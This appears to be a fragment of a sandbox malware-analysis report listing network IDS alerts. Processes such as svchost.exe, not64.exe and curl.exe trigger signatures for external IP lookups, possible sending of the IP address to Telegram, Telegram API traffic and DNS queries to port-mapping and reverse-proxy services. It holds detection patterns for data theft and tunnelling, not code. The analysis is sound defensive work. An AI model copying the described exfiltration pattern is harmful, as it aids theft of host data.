ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io)
2196
svchost.exe
Misc activity
SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
5400
not64.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
2196
svchost.exe
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
5400
not64.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
2196
svchost.exe
Potential Corporate Privacy Violation
ET INFO DNS Query to a Reverse Proxy Service Observed
2196
svchost.exe
Misc activity
ET INFO DNS Query for Port Mapping/Tunneling Service Domain (.portmap .io)
1128
curl.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
No debug info